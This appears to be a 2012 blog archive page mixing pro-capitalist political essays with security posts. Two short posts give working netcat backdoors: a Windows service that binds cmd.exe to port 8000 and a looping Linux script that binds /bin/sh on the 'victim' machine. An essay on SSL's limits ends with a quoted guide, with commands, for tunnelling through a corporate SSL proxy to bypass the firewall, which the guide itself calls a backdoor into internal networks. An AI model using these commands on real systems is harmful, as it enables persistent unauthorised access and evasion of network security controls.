Friday, 17 August 2012

Scripting Netcat

We can also create a script to set NC as a service in Windows.

We can start with creating a batch file “Netcat.bat” to run our netcat command. The file needs to make a call such as:

  • nc -L -p 8000 -t -e %systemroot%\system32\cmd.exe

And if you want to know more about writing Windows Batch files, see the following links:

Run this as a user with permission to create services:

  • sc create ServiceNetCat binpath= "C:\Windows\System32\cmd.exe /C C:\Temp\Netcat.bat"

But, all said and done. I need to point you to Metasploit. There is a great tutorial already on the site:

http://www.offensive-security.com/metasploit-unleashed/Persistent_Netcat_Backdoor

 

You can also see more on my older posts:

http://gse-compliance.blogspot.com.au/search?q=netcat+windows

Thursday, 16 August 2012

A NetCat Persistent Listener

It is very simple to use NetCat to create a Persistent  Listener (basically a command shell backdoor).

 

On the Victim’s machine (this is the machine you are testing and exploiting):

Create a script:

 

#!/bin/sh

#listener.sh

   while [1];

    do echo “Started”;

                nc –l –p <Port> –e /bin/sh;

    done

 

Run:

$ chmod 555 listener.sh

$ nohup ./listener.sh &

 

 

The Tester’s Machine:

$ nc –l –p <Port>

 

Where <Port> is any port to use (1-65534)

Wednesday, 15 August 2012

On equality

Some argue that capitalism fails as it does not lead to equality. That is a fallacy we need to avoid. The only equality we can achieve is one of equal destitution and even that would be one beyond us. We are all equally poor and suffering or we are unequal.

Why, how could this be you ask?

Easy, we are not equal. We are not born equal. We do not remain equal.

No two people have the same level of intelligence, the same aptitude and nor do we have the same proclivities.

We're not a Tabler Rosser.

People are not a blank slate.

Some of us are born communicators. Some are good in mathematics. Some of us like to code. Some enjoy fitness and outdoor activity and others would rather sit in front of the computer and develop computer programs.

Just as we cannot take a 5 foot one man and make him an NBA star, we can easily not change those people who are NBA stars into things they are not.

We exist in a world of diversity. This is our strength as humanity. Where one person or one group earns more than another it is because in an open market they have services that are desired more.

As far as employment goes there reasons for this. This is a lack in one field that is not being fulfilled by the people within it. Wages are high in an open market as there is a scarcity. When there are high wages others are attracted to this field. This is the natural equalizer.

We do not require government intervention to achieve this equilibrium. We just need a free-market without intervention.

We need to stop thinking that those who have less cannot achieve themselves. We need to recognize that people from both wealth and from poverty can achieve or fail. We need to allow people to fail for this is how they learn and develop.

We are not equal, we cannot be equal, and it is a fool's quest to seek equality. The only equality is an equality of misery.

In making a richer world where all people have enough and can survive we create a world with divisions. Until we accept this all we do is make more suffering.

Tuesday, 14 August 2012

SSL Secure Socket Layer… Or Open Door to “Hackers”

Debunking the myths behind SSL

The following is taken, updated and generally munged from a document published in 1999 by DeMorgan. I am one of several authors behind the material but the copyright remains with myself.

Abstract

Secure Sockets Layer (SSL) has been touted as the holy grail of network security by numerous vendors. This is, if not blatantly incorrect, at least misleading. SSL may (as most security tools) help cover some security issues if correctly implemented, these being mostly privacy. SSL most certainly does not cover the full spectrum of security issues as is often claimed by many vendors.

Worse, it has a basis in DNS for its level of security with the ability to bypass SSL being generally tied to an ability to change name spaces.

This post discusses some broad issues with SSL. In particular, from the perspective of most “hackers”, SSL is the ideal conduit to use to conduct attacks.

What is SSL

The SSL (Secure Sockets Layer) Handshake Protocol (as developed by Netscape Communications Corporation) was designed to provide and privacy over using Internet transactions. SSL was designed to be application independent, allowing protocols like HTTP (HyperText Transfer Protocol), FTP (File Transfer Protocol), and Telnet to be layered on top of it transparently.

TLS (Transport Layer Security) is a protocol that is based on and very similar to SSL 3.0. TLS is not widely implemented but addresses many of the issues with SSL. One of the main obstacles to TLS being widely deployed is the lack of a widely deployed and securely managed PKI infrastructure.

SSL restricts the deployment of network based “Sniffers” to look for passwords or other information. Unfortunately most attacks are not based on sniffers being used.

The Issues

In the past, web server security was based on placing a Firewall in front of the network. Today, securing a network has become far more sophisticated. Nearly all attacks against a web server involve issues with server or client vulnerabilities. SSL does not help stop these. Rather, SSL makes life easy for the attacker.

This is a rather inflammatory statement; so let me take the time to explain the cause. SSL is based on end-to-end encryption of a stream of data. This results in Firewalls and IDS (Intrusion Detection Servers) not being able to view or filter the data. SSL is just HTML with encryption. HTML contains many functions, many of which are restricted through the use of Firewall devices. SSL hides all code from the security devices.

The Firewall

Firewalls filter ports. A firewall basically reduces the number of protocols allowed from one source to another. This is an extremely simplified view that covers the needs to this paper. A Firewall has to allow certain protocols to a Web server. If the Web server uses SSL it also has to allow this.

With HTTP, a firewall can restrict the higher layer functions of HTML code. Some of these include:

  • GET General call to get a page/object
  • HEAD Call to get the page headers
  • POST Call to send information
  • PUT Call to Upload pages or objects.

PUT as a call should be blocked in most cases from the Internet in general. At the least it should be restricted to only certain files and/or directories. SSL restricts a security administrator’s ability to block or control this method.

HTML may be used to a forwarding protocol and embed other protocols. Firewalls are usually setup to restrict this. SSL is a method used by attackers to bypass Firewall restrictions.

IDS Servers

IDS or Intrusion Detection Systems were developed to enhance security offerings and fill some of the holes left with Firewalls. An IDS works by looking for attack signatures, or basically known attacks.

The Host

Most websites use SSL certificates giving the impression of security. This provides some layer of privacy (and only some) to the transmission stream, but nothing to security. SSL does not prevent the merchant, the merchant's employees or a hacker targeting the server, and from accessing information or compromising the system.

Web servers must restrict the documents returned by HTTP requests to be only those intended by the server administrators. A web server that translates HTTP URIs directly into file system calls must ensure that it does not serve restricted files to HTTP clients. Files intended for reference only internally to the server (such as access control files, configuration files, and script code) must be protected from inappropriate retrieval (e.g. the password file). Minor bugs in such HTTP servers have turned into major security risks. SSL stops Firewalls from restricting these types of attacks. SSL stops an IDS from detecting them.

POST and PUT are HTTP methods stopped by most good Firewalls. SSL stops these being filtered.

The Hacker and SSL

Tools such as “Brute Web (SSL)” attacks either SSL encoded or clear text Web servers. An IDS host will detect this attack if it can see it. SSL restricts the ability of an IDS host to see and thus alert to this (and other) attacks. From the point of view of the attacker, SSL is an easy way to disguise attacks against web servers.

Tunnelling through SSL

IP tunnelling through an SSL proxy is also possible. This resulting in an IP tunnel being able to be sent through a Firewall or other “choke-point” device on a network. Using SSL tunnelling, not only does the attacker not need to be concerned with being detected on an IDS system. The attacker can bypass any of the Firewall rules accessing the internal network and bypassing any and all security controls.

To Conclude

SSL is a tool, one of many. If used correctly, it can help protect privacy. Do not fool yourself though, SSL does not make a site secure. In most cases it makes it easier for the attacker. SSL is the perfect protocol to enable a site to be attacked and compromised before an administrator can work to stop or restrict the attack.


Appendices

Appendix 1 – An overview on HTTP (See W3.org)

The Hypertext Transfer Protocol (HTTP) is an application-level protocol. HTTP is designed to be a generic, stateless, object-oriented protocol which can be used for many tasks, such as name servers and distributed object management systems, through extension of its request methods (commands). The major feature of HTTP is the typing of data representation, allowing systems to be built independently of the data being transferred.

HTTP is also used as a generic protocol for communication between user agents and proxies/gateways to other Internet protocols, such as SMTP, NNTP, FTP, Gopher, and WAIS, allowing basic hypermedia access to resources available from diverse applications and simplifying the implementation of user agents.

The "http" scheme is used to locate network resources via the HTTP protocol. This section defines the scheme-specific syntax and semantics for http URLs.

http_URL = "http:" "//" host [ ":" port ] [ abs_path ]

host = <A legal Internet host domain name

or IP address (in dotted-decimal form),

as defined by Section 2.1 of RFC 1123>

  • port = *DIGIT

If the port is empty or not given, port 80 is assumed. The semantics are that the identified resource is located at the server listening for TCP connections on that port of that host, and the Request-URI for the resource is abs_path. If the abs_path is not present in the URL, it must be given as "/" when used as a Request-URI.

HTTP cannot regulate the content of the data that is transferred. Applications should supply as much control over this information as possible to the provider of that information. Three header fields are worth special mention in this context: Server, Referer and From. Revealing the specific software version of the server may allow the server machine to become more vulnerable to attacks against software that is known to contain security holes. SSL hides information gathering attacks from Firewalls and IDS.

The GET and HEAD methods “should” never take an action other than retrieval. For this reason, these methods are generally considered "safe." User agents must represent other methods, such as POST or PUT, in a special way, so that the user is made aware of the fact that a possibly unsafe action is being requested.


Appendix 2 – Tunnelling through an SSL Proxy

Taken From: "Coaxial Karma" 


-[ Introduction ]-


I know this may be known stuff, but since I haven't seen a lot of


released  tools to implement this concept (through an SSL Proxy),


I've decided to write something about it.


Here is what you'll need in order to create your tunnel:


1) Two linux boxes with root privileges - one on each side of the firewall


2) pppd-2.2 or greater - already installed on both linux boxes


   (it is recommended to use the same version on both linux boxes)


3) ipfwadm-2.3.0 or greater - already installed on both linux boxes


4) ppptcp-ssl.tar.gz (207.236.226.123/ppptcp-ssl.tar.gz)


Futhermore, you must have the following options turned ON in your


kernel:


        - Network firewalls


        - Forwarding/gatewaying


        - IP: Firewalling


        - Masquerading


And make sure IP forwarding is turned ON (not only in your kernel!)


The following has been tested with:


        - linux kernel 2.0.29/2.0.35/2.0.37


        - pppd 2.2.0/2.3.7


        - ipfwadm 2.3.0


-[ Installation ]-


On both linux boxes, do the following:


1) cd /usr/local/src; tar zxvf ppptcp-ssl.tar.gz


2) cd ppptcp-0.6; make


-[ Configuring the tunnel ]-


Let's assume the following configuration:


Linux #1 IP:           10.8.20.50 (inside the corporate network)


Linux #2 IP:           154.5.21.77 (outside the corporate network)


Proxy IP:              10.8.18.254 (port 8080)


Your default route:    10.8.20.1


1) Start a ppptcp server on Linux #2 listening on port 443:


        ppptcp 443 -- silent 192.168.1.1:192.168.1.2 proxyarp &


2) Configure ipfwadm on Linux #2 to masquerade for Linux #1:


        ipfwadm -F -a accept -S 192.168.1.2/32 -m


3) Deletdefault route on Linux #1:


        route del default


4) Add a route to your proxy on Linux #1:


        route add -host 10.8.18.254 gw 10.8.20.1


5) Start a ppptcp client on Linux #1 (also support authentication):


        ppptcp 154.5.21.77 443 10.8.18.254 8080 &


6) Add a default route on Linux #1:


        route add default gw 192.168.1.1


7) You're set!


Once the tunnel is established, you could also use Linux #1 as a


router for friends in your corporate network.  They could then access


the Internet without any restrictions.  In order to do so, you need


to:


1) Add a masquerading rule to Linux #1 for your friends:


        ipfwadm -F -a accept -S 10.8.20.0/24 -m


2) Delete default route on machines that want to bypass firewall:


        route delete 0.0.0.0 (on Win95/98/NT)


        route del default (on UNIX)


3) Add a default route on machines that want to bypass firewall:


        route add 0.0.0.0 MASK 0.0.0.0 10.8.20.50 (on Win95/98/NT)


        route add default gw 10.8.20.50 (on UNIX)


-[ Conclusion ]-


By default, ppptcp doesn't encrypt the traffic.  If you want it to


encrypt the traffic, read the INSTALL file provided with ppptcp ;-)


It may also be interesting to note that making internal machines


reachable to Linux #2 is also trivial once the tunnel has been


established.  Therefore, this makes for an interesting backdoor


to internal network.


have phun!


ck


-[ Credits ]-


1) encode_base64() function has been excerpt from httptunnel 2.11


   from Lars Brinkhoff.


2) ppptcp-0.6 from Sam Lantinga has been slightly modified to


   support SSL proxy and proxy authentication.

Monday, 13 August 2012

Why socialism has to fail.

We see many calls to alternate systems.
More, we see many miscomprehensions of existing systems. The confusion of capitalism with Corporatism is one of the most common. Capitalism and corporatism could not be further from each other. Although it appears to favour big business and the corporate model, corporatism is more closely aligned to socialism than to capitalism. Corporatism is a type of fascism and like all systems that aim towards big government leads towards a totalitarian regime. The reason for this is simple; it is forcing the views of a few onto many.
Whether we're looking at redistribution through a corporatist or socialist regime the underlying principle is one of force.
This is the true distinction between socialism and capitalism. Socialism does not seek to convince people of its merits; rather it uses force and violence to complete its ends.
We can argue that it is not fair for some to have more than others. This however is an economic factor in any society that no system will change. All we can do is create a system that allows others to develop. Capitalism is not a system that allows unbridled success. It is one that allows continual failure.
The reason why this makes such a distinction is that growth and development, innovation even, come from a process of failures. There is nothing that gives us the right to stay in the same place. There is nothing that guarantees us a job for life. There is nothing and no reason why we should expect what we have learned now to be all we need to know. Most of all there is no reason to expect that we will not have to change many many times.
The argument that you were a car worker and that your parents were car workers has no weight. If there is no longer any need for car workers, society has no need to pay you for that service. We seem to forget all too quickly the growth and new technologies dynamically displace the old. Just as there is little space for fletchers, crofters and blacksmiths there will be no place in society for many jobs that are current now.
The protections of socialism are inherently evil for the simplicity of force. Capitalism requires that we barter and trade and seek agreement for those things we wish to obtain for either ourselves or others. Socialism on the other hand simply uses force to redistribute the hard earnt income of one party for the supposed benefit of another. What is worse in this calculation is that no means of measuring the perceived end benefit exist. This means that the socialist can always claim that they have been successful. They can state that there redistribution has helped more than it has harmed.
What they ignore is that their view of what is best may not be that of others. We also have a right to dispose of the property we create ourselves. Socialism crushes this right through force.
What the Socialist seeks to avoid is any requirement to justify their beliefs. They do not want to compare them with the virtues of others for they see all other paths and motives as an abomination to their own.
In place of convincing others, the Socialist resorts to force.
In the case that it is not clear that the touted benefit will help more than the cost to society there is little reason to engage in an activity. Economically only those activities that bring a net gain rather than a net loss should be allowed to continue. For the Socialist however they see only their experiment as viable. It is a religion and one based on crushing the will of all those who oppose it. In place of debate and scientific evidence coupled with logical rhetoric the Socialist uses force.
This is the true difference between socialism and capitalism.
True market capitalism is based on the free exchange of goods. Virtue is neither required nor a part of this. It is a separate process that should be sought but remains apart from capitalism. No government can force virtuous behaviour.
That stated, a capitalist society may be good or evil depending on the morality of its people but the government itself can never control this.